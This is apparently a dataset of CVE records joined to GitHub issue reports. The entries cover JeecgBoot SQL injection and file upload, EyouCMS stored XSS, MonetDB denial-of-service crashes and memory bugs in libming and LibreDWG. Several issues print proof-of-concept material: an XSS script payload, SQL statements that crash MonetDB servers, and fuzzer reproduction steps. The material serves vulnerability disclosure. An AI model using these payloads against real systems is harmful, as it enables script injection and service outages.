] | 89 | https://github.com/jeecgboot/jeecg-boot/issues/4976 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] |
##### 版本号:
JECG3.5.1 And JECG3.5.0
##### 前端版本:vue3版?还是 vue2版?
vue3
##### 问题描述:
After testing, it was found that the id parameter of the/jeecg-boot/jmreport/show interface of jeecg-boot has SQL injection and is unauthorized.
##### 截图&代码:
Download and use https://github.com/jeecgboot/jeecg-boot Aft... | Unauthorized SQL injection in Jeecg3.5.0 and 3.5.1 | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4976/comments | 3 | 2023-05-25T02:08:54Z | 2023-06-18T13:06:06Z | https://github.com/jeecgboot/JeecgBoot/issues/4976 | 1,724,968,984 | 4,976 |
CVE-2023-34660 | 2023-06-16T18:15:09.483 | jjeecg-boot V3.5.0 has an unauthorized arbitrary file upload in /jeecg-boot/jmreport/upload interface. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"inte... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/4990"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/4990"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FEDFF952-7B1F-44EB-98BA-265CB22D6FB3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | [
"434"
] | 434 | https://github.com/jeecgboot/jeecg-boot/issues/4990 | [
"Exploit"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | ##### 版本号:
目前确定影响:3.5.0 & 3.5.1(其它版本未验证)
##### 前端版本:vue3版?还是 vue2版?
vue3版
##### 问题描述:
经测试发现/jeecg-boot/jmreport/upload接口存在未授权任意文件上传,可以上传html文件造成存储型的XSS。
##### 截图&代码:
下载使用https://github.com/jeecgboot/jeecg-boot项目源代码启动项目后,
入口:“报表设计器”-->"新建报表"-->"插入图片"
抓取包,获得上传接口,下面证明任意文件上传的存在。
 vulnerability in Eyoucms v1.6.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the web_recordnum parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/43"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"79"
] | 79 | https://github.com/weng-xianhu/eyoucms/issues/43 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | There is a storage type cross site scripting vulnerability in the filing number of the Basic Information tab on the backend management page of EyouCMS v1.6.2

 via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/MonetDB/MonetDB/issues/7387"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*",
"matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"89"
] | 89 | https://github.com/MonetDB/MonetDB/issues/7387 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"MonetDB",
"MonetDB"
] | **Describe the bug**
MonetDB server 11.46.0 crashes in `rel_sequences` after executing SQL statements through mclient.
**To Reproduce**
```sql
ALTER SEQUENCE x INCREMENT BY 2;
```
**Expected behavior**
Executing statements successfully or throwing errors, instead of breaking down the whole MonetDB server.
... | MonetDB server 11.46.0 crashes in `rel_sequences` | https://api.github.com/repos/MonetDB/MonetDB/issues/7387/comments | 2 | 2023-06-16T18:46:26Z | 2024-06-27T13:18:31Z | https://github.com/MonetDB/MonetDB/issues/7387 | 1,761,141,292 | 7,387 |
CVE-2023-36363 | 2023-06-22T14:15:09.740 | An issue in the __nss_database_lookup component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/MonetDB/MonetDB/issues/7384"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*",
"matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"89"
] | 89 | https://github.com/MonetDB/MonetDB/issues/7384 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"MonetDB",
"MonetDB"
] | **Describe the bug**
MonetDB server 11.46.0 crashes at `__nss_database_lookup` after executing SQL statements through mclient.
**To Reproduce**
Use the `mclient` binary to connect MonetDB server and execute the following stmts:
```sql
create schema test;
drop schema test cascade;
create schema test;
set sche... | MonetDB server 11.46.0 crashes at `__nss_database_lookup` | https://api.github.com/repos/MonetDB/MonetDB/issues/7384/comments | 2 | 2023-06-16T18:25:56Z | 2024-06-27T13:18:29Z | https://github.com/MonetDB/MonetDB/issues/7384 | 1,761,117,903 | 7,384 |
CVE-2023-36364 | 2023-06-22T14:15:09.790 | An issue in the rel_deps component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/MonetDB/MonetDB/issues/7386"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*",
"matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"89"
] | 89 | https://github.com/MonetDB/MonetDB/issues/7386 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"MonetDB",
"MonetDB"
] | **Describe the bug**
MonetDB server 11.46.0 crashes in `rel_deps` after executing SQL statements through mclient.
**To Reproduce**
```sql
CREATE VIEW t2 AS SELECT 1 UNION ALL SELECT 1;
CREATE VIEW v2 AS SELECT * FROM t2;
```
**Expected behavior**
Executing statements successfully or throwing errors, instead... | MonetDB server 11.46.0 crashes in `rel_deps` | https://api.github.com/repos/MonetDB/MonetDB/issues/7386/comments | 1 | 2023-06-16T18:43:11Z | 2024-06-27T13:18:30Z | https://github.com/MonetDB/MonetDB/issues/7386 | 1,761,137,805 | 7,386 |
CVE-2023-36365 | 2023-06-22T14:15:09.837 | An issue in the sql_trans_copy_key component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/MonetDB/MonetDB/issues/7378"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*",
"matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"770"
] | 770 | https://github.com/MonetDB/MonetDB/issues/7378 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"MonetDB",
"MonetDB"
] | **Describe the bug**
MonetDB server crashes at sql_trans_copy_key after executing SQL statements through ODBC.
**To Reproduce**
```sql
START TRANSACTION;
CREATE TEMPORARY TABLE temptest3(col int PRIMARY KEY) ON COMMIT DROP;
CREATE TEMPORARY TABLE temptest4(col int, FOREIGN KEY (col) REFERENCES temptest3);
```
... | MonetDB server crashes at sql_trans_copy_key | https://api.github.com/repos/MonetDB/MonetDB/issues/7378/comments | 2 | 2023-06-16T15:58:24Z | 2024-06-27T13:18:24Z | https://github.com/MonetDB/MonetDB/issues/7378 | 1,760,900,711 | 7,378 |
CVE-2023-36366 | 2023-06-22T14:15:09.883 | An issue in the log_create_delta component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/MonetDB/MonetDB/issues/7381"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*",
"matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"770"
] | 770 | https://github.com/MonetDB/MonetDB/issues/7381 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"MonetDB",
"MonetDB"
] | **Describe the bug**
MonetDB server 11.46.0 crashes at `log_create_delta` after executing SQL statements through mclient.
**To Reproduce**
```sql
CREATE TABLE t1(unique_constraint INT PRIMARY KEY);
START TRANSACTION;
ALTER TABLE t1 ADD COLUMN uniq_c1_c2_c3 INT;
ALTER TABLE t1 DROP COLUMN uniq_c1_c2_c3;
COMMIT... | MonetDB server 11.46.0 crashes at `log_create_delta` | https://api.github.com/repos/MonetDB/MonetDB/issues/7381/comments | 2 | 2023-06-16T17:04:12Z | 2024-06-27T13:18:27Z | https://github.com/MonetDB/MonetDB/issues/7381 | 1,761,007,588 | 7,381 |
CVE-2023-36367 | 2023-06-22T14:15:09.930 | An issue in the BLOBcmp component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/MonetDB/MonetDB/issues/7380"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*",
"matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"770"
] | 770 | https://github.com/MonetDB/MonetDB/issues/7380 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"MonetDB",
"MonetDB"
] | **Describe the bug**
MonetDB server 11.46.0 crashes at `BLOBcmp` after executing SQL statements through mclient.
**To Reproduce**
```sql
CREATE TABLE a (p_id INT, p_name BLOB);
INSERT INTO a VALUES (1,NULL);
TRACE select * from a where p_name='Lilu';
```
**Expected behavior**
Executing statements successfu... | MonetDB server 11.46.0 crashes at `BLOBcmp` | https://api.github.com/repos/MonetDB/MonetDB/issues/7380/comments | 2 | 2023-06-16T16:57:43Z | 2024-06-27T13:18:26Z | https://github.com/MonetDB/MonetDB/issues/7380 | 1,760,998,433 | 7,380 |
CVE-2023-36368 | 2023-06-22T14:15:09.977 | An issue in the cs_bind_ubat component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/MonetDB/MonetDB/issues/7379"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*",
"matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"770"
] | 770 | https://github.com/MonetDB/MonetDB/issues/7379 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"MonetDB",
"MonetDB"
] | **Describe the bug**
MonetDB server crashes at `cs_bind_ubat` after executing SQL statements through ODBC.
**To Reproduce**
```sql
CREATE TABLE t2 (c1 int, t1 int, c2 int);
INSERT INTO t2 VALUES(127,255,1),(127,1,2),(-128,0,3),(-128,2,4),(-1,NULL,5);
INSERT INTO t2 VALUES(200,126,1),(250,-127,2);
INSERT INTO t... | MonetDB server 11.46.0 crashes at cs_bind_ubat | https://api.github.com/repos/MonetDB/MonetDB/issues/7379/comments | 2 | 2023-06-16T16:52:13Z | 2024-06-27T13:18:25Z | https://github.com/MonetDB/MonetDB/issues/7379 | 1,760,991,161 | 7,379 |
CVE-2023-36369 | 2023-06-22T14:15:10.023 | An issue in the list_append component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/MonetDB/MonetDB/issues/7383"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*",
"matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"770"
] | 770 | https://github.com/MonetDB/MonetDB/issues/7383 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"MonetDB",
"MonetDB"
] | **Describe the bug**
MonetDB server 11.46.0 crashes at `list_append` after executing SQL statements through mclient.
**To Reproduce**
```sql
create table t1(c1 int auto_increment primary key NOT NULL);
create trigger i1 after insert on t1 for each row insert into t1 values(NULL);
insert into t1 values(NULL);
`... | MonetDB server 11.46.0 crashes at `list_append` | https://api.github.com/repos/MonetDB/MonetDB/issues/7383/comments | 2 | 2023-06-16T17:58:27Z | 2024-06-27T13:18:28Z | https://github.com/MonetDB/MonetDB/issues/7383 | 1,761,077,451 | 7,383 |
CVE-2023-36370 | 2023-06-22T14:15:10.067 | An issue in the gc_col component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/MonetDB/MonetDB/issues/7382"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*",
"matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"770"
] | 770 | https://github.com/MonetDB/MonetDB/issues/7382 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"MonetDB",
"MonetDB"
] | **Describe the bug**
MonetDB server 11.46.0 crashes at `gc_col` after executing SQL statements through ODBC.
**To Reproduce**
1. Configure the unixODBC with MonetDB ODBC drivers
2. Use the command line like `isql monetdb -v -e` to connect (**to trigger the crash, the '-e' option is necessary.** But I don't know w... | MonetDB server 11.46.0 crashes at `gc_col` | https://api.github.com/repos/MonetDB/MonetDB/issues/7382/comments | 2 | 2023-06-16T17:28:01Z | 2024-06-27T13:18:27Z | https://github.com/MonetDB/MonetDB/issues/7382 | 1,761,035,852 | 7,382 |
CVE-2023-36371 | 2023-06-22T14:15:10.117 | An issue in the GDKfree component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/MonetDB/MonetDB/issues/7385"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:monetdb:monetdb:11.45.17:*:*:*:*:*:*:*",
"matchCriteriaId": "FDFC7EDE-25CA-42BF-8D78-5EDBF01ED8F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"770"
] | 770 | https://github.com/MonetDB/MonetDB/issues/7385 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"MonetDB",
"MonetDB"
] | **Describe the bug**
MonetDB server 11.46.0 crashes in `GDKfree` after executing SQL statements through mclient.
**To Reproduce**
1. Use mclient to connect MonetDB server;
2. Try to execute the following SQL statements **multiple times**. Sometimes they will crash the server. (On my machine, the server crashes af... | MonetDB server 11.46.0 crashes in `GDKfree` | https://api.github.com/repos/MonetDB/MonetDB/issues/7385/comments | 3 | 2023-06-16T18:40:11Z | 2023-09-18T07:58:41Z | https://github.com/MonetDB/MonetDB/issues/7385 | 1,761,134,477 | 7,385 |
CVE-2023-36093 | 2023-06-22T15:15:13.580 | There is a storage type cross site scripting (XSS) vulnerability in the filing number of the Basic Information tab on the backend management page of EyouCMS v1.6.3 | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/44"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0DDC6EF0-7D79-4155-B984-0BA7756C05EC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"79"
] | 79 | https://github.com/weng-xianhu/eyoucms/issues/44 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | There is a storage type cross site scripting vulnerability in the filing number of the Basic Information tab on the backend management page of EyouCMS v1.6.3
poc:
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
 function at parser.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/273"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Pa... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.7:*:*:*:*:*:*:*",
"matchCriteriaId": "18B4A4AA-DE48-45A4-AE25-1C83C1CDC743",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"120"
] | 120 | https://github.com/libming/libming/issues/273 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | # Allocation size overflow in parseSWF_DEFINEFONTINFO() at parser.c:1948
Allocation size overflow in the listswf at function parseSWF_DEFINEFONTINFO in parser.c:1948.
## Environment
Ubuntu 18.04, 64 bit
libming 0.4.7
## Steps to reproduce
1. download file
```
git clone https://github.com/libming/libming.g... | Allocation size overflow in parseSWF_DEFINEFONTINFO() at parser.c:1948 | https://api.github.com/repos/libming/libming/issues/273/comments | 0 | 2023-06-13T07:08:07Z | 2023-06-13T07:08:07Z | https://github.com/libming/libming/issues/273 | 1,754,192,903 | 273 |
CVE-2023-36271 | 2023-06-23T15:15:10.027 | LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_wcs2nlen at bits.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/681#BUG2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"T... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*",
"matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"787"
] | 787 | https://github.com/LibreDWG/libredwg/issues/681#BUG2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | Hello, I was testing my fuzzer and found two bugs in dwg2SVG.
## environment
ubuntu 20.04, GCC 9.4.0, libredwg latest commit 9df4ec3c524795a401acf371c8a953f5b1a6fadf
compile with
```
./autogen.sh && ./configure --disable-shared && make -j$(nproc)
```
##BUG1
```
./dwg2SVG ../pocs/poc0.bit_utf8_to_TU
==... | [FUZZ] two bugs in dwg2SVG | https://api.github.com/repos/LibreDWG/libredwg/issues/681/comments | 3 | 2023-03-31T04:10:48Z | 2023-03-31T13:37:12Z | https://github.com/LibreDWG/libredwg/issues/681 | 1,648,637,134 | 681 |
CVE-2023-36272 | 2023-06-23T15:15:10.103 | LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_utf8_to_TU at bits.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/681#BUG1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"T... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*",
"matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"787"
] | 787 | https://github.com/LibreDWG/libredwg/issues/681#BUG1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | Hello, I was testing my fuzzer and found two bugs in dwg2SVG.
## environment
ubuntu 20.04, GCC 9.4.0, libredwg latest commit 9df4ec3c524795a401acf371c8a953f5b1a6fadf
compile with
```
./autogen.sh && ./configure --disable-shared && make -j$(nproc)
```
##BUG1
```
./dwg2SVG ../pocs/poc0.bit_utf8_to_TU
==... | [FUZZ] two bugs in dwg2SVG | https://api.github.com/repos/LibreDWG/libredwg/issues/681/comments | 3 | 2023-03-31T04:10:48Z | 2023-03-31T13:37:12Z | https://github.com/LibreDWG/libredwg/issues/681 | 1,648,637,134 | 681 |
CVE-2023-36273 | 2023-06-23T15:15:10.160 | LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_calc_CRC at bits.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/677#BUG1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"T... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*",
"matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"787"
] | 787 | https://github.com/LibreDWG/libredwg/issues/677#BUG1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] |
Hello, I was testing my fuzzer and found two bugs in dwg2dxf, which is different from #368 and #484
## environment
ubuntu 20.04, GCC 9.4.0, libredwg latest commit 77a85621de6e2c7ea44bc48c02e52dac97778ecb
compile with
```
./autogen.sh && ./configure --disable-shared && make -j$(nproc)
```
## BUG1
```
